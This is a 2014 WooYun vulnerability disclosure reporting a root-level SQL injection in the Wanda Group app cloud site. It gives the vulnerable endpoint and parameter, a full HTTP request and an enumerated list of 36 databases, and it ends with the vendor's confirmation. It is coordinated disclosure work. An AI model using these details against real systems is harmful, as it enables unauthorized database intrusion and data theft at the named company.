当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089544

漏洞标题:APP终结者13#万达集团APP云端主站SQL注入02涉及万达众多明星产品数据库!

相关厂商:大连万达集团股份有限公司

漏洞作者: zzR

提交时间:2014-12-31 18:12

修复时间:2015-02-14 18:12

公开时间:2015-02-14 18:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-31: 细节已通知厂商并且等待厂商处理中
2014-12-31: 厂商已经确认,细节仅向厂商公开
2015-01-10: 细节向核心白帽子及相关领域专家公开
2015-01-20: 细节向普通白帽子公开
2015-01-30: 细节向实习白帽子公开
2015-02-14: 细节向公众公开

简要描述:

继续打卡`大概2015年1月1日发!
sql注入,root用户,dba权限!涉及万达众多产品数据库!

详细说明:

万达集团APP云端主站sql注入 root 权限

POST /todo/m/getSubOrgs.do HTTP/1.1
Host: app.wanda.cn
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko)
Version/7.0 Mobile/11B554a Safari/9537.53
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://app.wanda.cn/todo/test3/getSubOrgs.jsp
Cookie: JSESSIONID=75ACD15FFF94BB2892D4B23B79668661
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
orgCode=100122


1.png

漏洞证明:

available databases [36]:
[*] appReportsSummary
[*] bannaleyuan
[*] cdb
[*] cmsmoviepark
[*] gw_misc_db
[*] gw_weixin_db
[*] hanxiu_db
[*] herbin
[*] htxcms
[*] information_schema
[*] knifecms1
[*] knifecms2
[*] meizi
[*] mobile_ehr
[*] mobile_share
[*] mobile_wanda
[*] mysql
[*] sydc_mail_db
[*] test
[*] TRSMAS
[*] TRSWCMV7
[*] TRSWCMV7Plugins
[*] wanda3v
[*] wandacinemaline_com
[*] wandakids
[*] wandakids_wx
[*] wdAppServer
[*] wdbh
[*] wdghydb
[*] wdnewspaper
[*] wdyy
[*] webmoviepark
[*] weeklydb
[*] wlghy
[*] wuhanhanxiu
[*] yuqing_db


从库中,可以看出
有万达 的app、电影公园、武汉汉秀品牌、wandacinemaline_com万达院线等等数据库

修复方案:

防线扩至云端

版权声明:转载请注明来源 zzR@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-12-31 18:19

厂商回复:

感谢zzR同学的关注与贡献!此漏洞目测存在,马上转业务部门整改!

最新状态:

暂无